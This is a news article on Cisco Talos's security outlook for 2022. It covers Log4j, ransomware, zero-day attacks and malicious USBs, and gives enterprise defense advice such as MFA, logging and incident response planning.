2022 will be another busy year for enterprise incident responders as ransomware, supply chain and myriad zero-day attacks will continue to rise, according to Cisco's Talos security experts.\nTo help address the threats, the Cisco Talos team used a blog and online presentation to detail steps enterprises can take to defend themselves against the growing field of bad actors and also to point out lessons learned from recent damaging exploits such as the Log4j vulnerability and Microsoft Exchange server zero-day threats.\nOnce, zero-day attacks were typically launched by state actors against service providers, but those days are gone, wrote Nick Biasini head of outreach at Cisco Talos in a blog about the security landscape in 2022. Now new, less experienced combatants seek out a broader range of targets, using less surgical attacks. \u201cThis has led to more risky behavior than we\u2019ve seen historically, without as much regard for collateral damage,\u201d he wrote.\nThese state actors have changed their strategies, as well. Rather than focusing on espionage against other nations, now they also target dissidents and activists with attacks designed to destroy and disrupt.\u00a0 At the same time criminal enterprises have become a larger threat thanks to the billions of dollars they are able to collect readily through cryptocurrencies. \u201cWe\u2019ve never faced more challenges as defenders\u2026\u201d Biasini stated.\nSome of the biggest challenges for 2022 include ongoing problems such as Log4j and ransomware.\nUnpatched Log4j remains a threat\nLog4j software is widely used in enterprise and consumer services, websites, and applications as an easy-to-use utility to support client\/server application development.\u00a0 But it has weakneses that, if exploited, could let unauthenticated remote actors take control of affected server systems and gain access to company information or unleash denial of service attacks.\nCisco telemetry has detected attackers exploiting these weaknesses in vulnerable VMware Horizon servers and infecting them with malicious payloads including Cobalt Strike\u2014a tool developed to help penetration testers protect networks but also used by attackers, said Neil Jenkins Cisco Talos Cyber Threat Alliance Chief Analytic Officer in an online presentation. Even though there have been warnings to patch against Log4j, not everyone does, and \u201cthere are still threat actors, particularly advanced threat actors, who may look to target those vulnerabilities in future,\u201d he said.\nCisco Talos stated that Log4j will be widely exploited moving forward, so users should patch affected products and implement mitigation solutions as soon as possible.\nRansomware still a scourge\nWith the exception of Q1, ransomware took up nearly 50% of all the threats that Talos tracked in 2021, thanks to the lure of lucrative payouts from ransomware victims. In turn, some of that cash will help ransomware cartels develop more sophisticated approaches. \u201cAs we saw with [supply chain attack] Kaseya, these cartels have the ability to purchase or develop zero-days to be leveraged in attacks, a trend that should concern us all and another reason why behavioral protection will continue to be an important aspect of detection in 2022 and beyond,\u201d Biasini stated.\nAnother issue is that there are more and more ransomware players. At the beginning of 2021, many attacks came from one group, but by the end of the year there were at least 13 different ones, Jenkins said.\u00a0 \u00a0\n\u201cEven with one family, you have a lot of different affiliates who are using different tactics, so even with one dominant family, you can see still see a diversification and the types of attacks and the types of tooling they\u2019ll use,\u201d Jenkins said.\u00a0\nThere are other factors that could change the ransomware landscape\u2014the US government\u2019s anti-ransomware initiatives for one\u2014as well as the scrutiny these groups are getting from law enforcement around the globe, Jenkins said.\u00a0Larger ransomware groups might fragment to be less detectable, and open-source ransomware developers may have a more difficult time as some of their forums are shut down. As a result, the attackers might choose smaller targets to avoid the publicity and attention from law-enforcement that larger attacks might draw, Jenkins said.\nThe best protection is to maintain cyber-defense best practices such as offline backups, instituting multi-factor authentication, and having incident response plans in place, Jenkins said. \u00a0\nZero day is here to stay\nThere has been a dramatic increase in zero-day attacks, with more than 50 discovered in the wild during 2021\u2014more than in all of 2019 and 2020 combined, Biasini stated.\nAnd zero days remain a rich source of attacks. At the recent Tianfu Cup hacking contest in China, there were no less than 30 successful exploits demonstrated against the short list of targets, including a handful that affected the latest versions of Windows and iOS. All of them were likely reported to the Chinese government due to recent regulation changes, Biasini stated, which can have consequences. The most recent example of this is Alibaba being penalized by the Chinese government for not disclosing Log4j to them in advance, he stated.\nBeware suspect USBs\nAnother interesting development has been the continued practice of one of the oldest vulnerabilities in the security realm\u2014the use of malicious USB devices.\n\u201cStarting in 2021, even carrying into this year, there has been an uptick of malicious USBs used as a means of initial access, which is a true blast from the past,\u201d Jenkins said. \u201cBut just a reminder that even these old, outdated attack vectors can still be used, and still have success.\u201d\nEnterprise best practices\nCisco Talos researchers did have recommendations for enterprise incident response.\u00a0\nPatching, inventorying, segmentation training, and having incident-response plans in place are all important, but the Cisco experts have one main suggestion: institute multi-factor authentication. \u201cWe identified that a lack of MFA is probably the biggest one of the biggest hindrances to enterprise security,\u201d Jenkins said.\u00a0\u201cThere is a large number of ransomware incidents that could have been avoided with MFA. So we absolutely encourage wherever possible when you can and especially on sensitive systems to, to institute MFA\u2014as soon as possible.\u201d\nSome other ideas:\n\nKeep accurate asset lists, current documentation and policies\u2014especially those related to patching. These are fundamental when it comes to incident response. \u201cThe last thing you want is to be in the middle of an active incident to find out you don\u2019t have an accurate inventory of assets or that you haven\u2019t patched anything in six months. Ensuring fundamentals like network segmentation and proper access controls are implemented will limit the effects of a breach,\u201d Cisco stated.\nGet software bills of materials (SBOM) from vendors when considering software options. That should allow a quick determination of how vulnerabilities in specific libraries or open-source software could change daily operations and hopefully allow for a more thorough and thoughtful response.\nPlan based on the idea you will be breached at some point. Create a cybersecurity incident response plan that includes all the stakeholders in the process. During an incident, every minute counts, making it crucial that the appropriate departments are ready to make decisions and take actions so containment can happen as soon as possible. Preparing and practicing your processes related to an incident can make the difference between mitigating a compromised system and suffering a total breach.\nEnable logging. This can be difficult and expensive, but it\u2019s crucial to have logging enabled when you are engaged in an incident. Without it, you may never be able to determine things like the initial infection vector or patient zero. These failures can be catastrophic if multiple actors are able to abuse that same undiscovered weakness, Cisco stated.